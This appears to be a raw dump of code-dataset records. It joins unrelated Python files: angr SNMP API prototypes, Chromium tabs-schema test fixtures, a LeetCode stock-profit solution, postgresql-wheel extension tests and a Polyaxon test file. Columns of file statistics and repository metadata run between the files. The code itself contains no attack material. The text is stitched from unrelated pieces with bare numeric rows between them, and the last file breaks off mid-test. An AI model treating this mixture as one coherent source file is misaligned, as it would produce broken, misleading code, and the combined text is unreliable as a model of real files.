'SnmpUtilOidToA': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypePointer(SimTypeChar(label="Byte"), offset=0), arg_names=["Oid"]),
#
'SnmpUtilIdsToA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeChar(label="Byte"), offset=0), arg_names=["Ids", "IdLength"]),
#
'SnmpUtilPrintOid': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["Oid"]),
#
'SnmpUtilPrintAsnAny': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pAny"]),
#
'SnmpSvcGetUptime': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
#
'SnmpSvcSetLogLevel': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_LOG")], SimTypeBottom(label="Void"), arg_names=["nLogLevel"]),
#
'SnmpSvcSetLogType': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_OUTPUT_LOG_TYPE")], SimTypeBottom(label="Void"), arg_names=["nLogType"]),
#
'SnmpUtilDbgPrint': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_LOG"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["nLogLevel", "szFormat"]),
}
lib.set_prototypes(prototypes)
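# Usage sketch (added for illustration, not part of the generated file; the
# accessor below is an assumption and may differ across angr versions):
# proto = lib.get_prototype('SnmpUtilMemAlloc')
# assert len(proto.args) == 1   # UInt32 nBytes -> void pointer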
| 397.445946
| 4,690
| 0.727109
| 3,240
| 29,411
| 6.583333
| 0.045062
| 0.180778
| 0.161463
| 0.199906
| 0.947586
| 0.946179
| 0.937318
| 0.924566
| 0.916315
| 0.913877
| 0
| 0.023936
| 0.069566
| 29,411
| 73
| 4,691
| 402.890411
| 0.755527
| 0.000952
| 0
| 0
| 0
| 0
| 0.224488
| 0.001534
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 310d6b0d97576ed0182b09e07b4e0b1f65009a5f
| 24,193
| py
| Python
| chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
| justremotephone/android_external_chromium_org
| 246856e61da7acf5494076c74198f2aea894a721
| ["BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause"] | 2
| 2019-01-16T03:57:28.000Z
| 2021-01-23T15:29:45.000Z
| chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
| justremotephone/android_external_chromium_org
| 246856e61da7acf5494076c74198f2aea894a721
| ["BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause"] | null | null | null
| chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
| justremotephone/android_external_chromium_org
| 246856e61da7acf5494076c74198f2aea894a721
| ["BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause"] | 2
| 2015-04-17T13:19:09.000Z
| 2021-10-21T12:55:15.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from extensions_paths import CHROME_EXTENSIONS
from test_file_system import MoveAllTo
TABS_SCHEMA_BRANCHES = MoveAllTo(CHROME_EXTENSIONS, {
'trunk': {
'docs': {
'templates': {
'json': {
'api_availabilities.json': '{}'
}
}
},
'api': {
'_api_features.json': '{}',
'_manifest_features.json': '{}',
'_permission_features.json': '{}',
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {},
'fakeTabsProperty3': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1500': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1453': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1410': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1364': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1312': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1271': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1229': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1180': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1132': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1084': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1025': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'963': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'912': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'874': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'835': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'782': {
'api': {
'extension_api.json': "{}"
}
}
})
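# Illustrative round-trip (added; the indexing into MoveAllTo's result is a
# hypothetical assumption -- verify against test_file_system.MoveAllTo):
# trunk_api = TABS_SCHEMA_BRANCHES[CHROME_EXTENSIONS]['trunk']['api']
# assert json.loads(trunk_api['tabs.json'])[0]['namespace'] == 'tabs'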
| 21.620197
| 72
| 0.236308
| 887
| 24,193
| 6.378805
| 0.10372
| 0.180629
| 0.104984
| 0.152704
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0
| 0.010142
| 0.612822
| 24,193
| 1,118
| 73
| 21.639535
| 0.593893
| 0.006407
| 0
| 0.522952
| 0
| 0
| 0.22489
| 0.020929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0027
| 0
| 0.0027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 3190b59ccf1361f84ec778e005efd2baff74455e
| 175
| py
| Python
| Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
| HarshOza36/LeetCode_Problems
| 6d7035e0d681213ac602b9e0382dbfa87f8d4745
| ["MIT"] | null | null | null
| Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
| HarshOza36/LeetCode_Problems
| 6d7035e0d681213ac602b9e0382dbfa87f8d4745
| ["MIT"] | null | null | null
| Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
| HarshOza36/LeetCode_Problems
| 6d7035e0d681213ac602b9e0382dbfa87f8d4745
| ["MIT"] | null | null | null |
from typing import List
class Solution:
    def maxProfit(self, prices: List[int]) -> int:
        # Greedy: with unlimited transactions, the maximum profit is the sum
        # of every positive day-over-day price increase.
        return sum(prices[i] - prices[i-1] if prices[i] > prices[i-1] else 0 for i in range(1, len(prices)))
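# Quick self-check (added example, not part of the original solution):
# buy at 1, sell at 5 (+4); buy at 3, sell at 6 (+3) -> total profit 7.
if __name__ == "__main__":
    assert Solution().maxProfit([7, 1, 5, 3, 6, 4]) == 7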
| 58.333333
| 108
| 0.64
| 31
| 175
| 3.612903
| 0.612903
| 0.25
| 0.232143
| 0.25
| 0.267857
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028369
| 0.194286
| 175
| 3
| 108
| 58.333333
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
31923fff5015d60143b25a72c85ec522f6e91f75
| 1,448
|
py
|
Python
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 55
|
2021-08-29T18:43:14.000Z
|
2022-03-16T20:56:54.000Z
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 3
|
2021-09-01T16:52:35.000Z
|
2021-12-29T19:49:27.000Z
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 5
|
2021-09-02T03:57:35.000Z
|
2022-03-16T20:56:57.000Z
|
import postgresql
from postgresql import tmp_postgres
def test_setup_teardown():
pgdata, conn = postgresql.setup()
postgresql.teardown(pgdata)
def test_fixture(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "select version()"')
def test_default_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION hstore;"')
def test_uuid_ossp_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c \'CREATE EXTENSION "uuid-ossp";\'')
def test_xml2_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION xml2;"')
def test_postgis_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_raster;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_topology;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_sfcgal;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION fuzzystrmatch;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION address_standardizer;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION address_standardizer_data_us;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_tiger_geocoder;"')
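# Hedged sketch (added): the same helpers outside the pytest fixture, assuming
# setup() yields the pair unpacked in test_setup_teardown above:
# pgdata, con_str = postgresql.setup()
# try:
#     postgresql.psql(f'-d "{con_str}" -c "SELECT version()"')
# finally:
#     postgresql.teardown(pgdata)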
| 36.2
| 90
| 0.71547
| 202
| 1,448
| 4.886139
| 0.188119
| 0.103343
| 0.182371
| 0.194529
| 0.729483
| 0.729483
| 0.729483
| 0.729483
| 0.729483
| 0.690983
| 0
| 0.001605
| 0.139503
| 1,448
| 39
| 91
| 37.128205
| 0.79053
| 0
| 0
| 0.185185
| 0
| 0
| 0.406077
| 0.052486
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0
| 0.296296
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 31b7d97a44386739d6c4ce39aaa3df436c860a27
| 38,152
| py
| Python
| tests/test_polyaxonfile/test_polyaxonfile.py
| gzcf/polyaxon-schemas
| a381280cd7535f64158d52f0a9eff2afec997d90
| ["MIT"] | null | null | null
| tests/test_polyaxonfile/test_polyaxonfile.py
| gzcf/polyaxon-schemas
| a381280cd7535f64158d52f0a9eff2afec997d90
| ["MIT"] | null | null | null
| tests/test_polyaxonfile/test_polyaxonfile.py
| gzcf/polyaxon-schemas
| a381280cd7535f64158d52f0a9eff2afec997d90
| ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import os
from unittest import TestCase
from polyaxon_schemas.bridges import NoOpBridgeConfig
from polyaxon_schemas.environments import (
EnvironmentConfig,
K8SResourcesConfig,
PodResourcesConfig,
RunConfig,
SessionConfig
)
from polyaxon_schemas.exceptions import PolyaxonfileError
from polyaxon_schemas.graph import GraphConfig
from polyaxon_schemas.logging import LoggingConfig
from polyaxon_schemas.losses import AbsoluteDifferenceConfig, MeanSquaredErrorConfig
from polyaxon_schemas.matrix import MatrixConfig
from polyaxon_schemas.models import ClassifierConfig, GeneratorConfig, RegressorConfig
from polyaxon_schemas.optimizers import AdamConfig
from polyaxon_schemas.polyaxonfile.polyaxonfile import PolyaxonFile
from polyaxon_schemas.polyaxonfile.specification.frameworks import (
HorovodSpecification,
MXNetSpecification,
PytorchSpecification,
TensorflowSpecification
)
from polyaxon_schemas.processing.pipelines import TFRecordImagePipelineConfig
from polyaxon_schemas.run_exec import RunExecConfig
from polyaxon_schemas.settings import EarlyStoppingMetricConfig, SettingsConfig
from polyaxon_schemas.utils import Frameworks, SearchAlgorithms, TaskType
class TestPolyaxonfile(TestCase):
def test_missing_version_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_version.yml'))
def test_wrong_project_name_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/wrong_project_name.yml'))
def test_missing_project_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_project.yml'))
def test_missing_kind_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_kind.yml'))
def test_simple_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/simple_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is None
assert spec.environment is None
assert spec.framework is None
assert spec.is_runnable
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert isinstance(spec.model, RegressorConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 4
assert spec.model.graph.input_layers == [['images', 0, 0]]
last_layer = spec.model.graph.layers[-1].name
assert spec.model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval is None
def test_simple_generator_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/simple_generator_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is None
assert spec.environment is None
assert spec.framework is None
assert spec.is_runnable
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert isinstance(spec.model, GeneratorConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert isinstance(spec.model.encoder, GraphConfig)
assert isinstance(spec.model.decoder, GraphConfig)
assert isinstance(spec.model.bridge, NoOpBridgeConfig)
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval is None
def test_advanced_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/advanced_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert spec.is_runnable
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert spec.environment.tensorflow.delay_workers_by_global_step is True
assert isinstance(spec.environment.tensorflow.run_config, RunConfig)
assert spec.environment.tensorflow.run_config.tf_random_seed == 100
assert spec.environment.tensorflow.run_config.save_summary_steps == 100
assert spec.environment.tensorflow.run_config.save_checkpoints_secs == 60
assert isinstance(spec.environment.tensorflow.run_config.session, SessionConfig)
assert spec.environment.tensorflow.run_config.session.allow_soft_placement is True
assert spec.environment.tensorflow.run_config.session.intra_op_parallelism_threads == 2
assert spec.environment.tensorflow.run_config.session.inter_op_parallelism_threads == 2
# check properties for returning worker configs and resources
assert spec.environment.tensorflow.worker_configs is None
assert spec.environment.tensorflow.ps_configs is None
assert spec.environment.tensorflow.worker_resources is None
assert spec.environment.tensorflow.ps_resources is None
cluster, is_distributed = spec.cluster_def
assert TensorflowSpecification.get_worker_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_ps_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
